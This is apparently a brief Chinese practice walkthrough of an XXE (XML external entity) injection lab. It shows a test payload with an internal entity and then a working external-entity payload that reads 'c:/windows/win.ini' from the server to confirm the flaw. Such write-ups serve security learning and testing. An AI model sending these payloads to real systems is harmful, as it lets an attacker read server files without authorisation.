XXE-外部实体注入漏洞
随便输入个非xml内容,会有一些提示
随便输入个包含命名实体的xml数据
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "吉同" > ]>
<foo>&xxe;</foo>
网页上回显 吉同 ,说明网页多输入的xml数据是有结果回显的。
接下来可以用带外部实体注入的方法,来确定是否支持外部实体,
c:/windows/win.ini是每个windows系统都有的文件,如果确定服务器是windows系统,就可以用该文件来确定是否有xxe漏洞。
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
可查看系统文件内容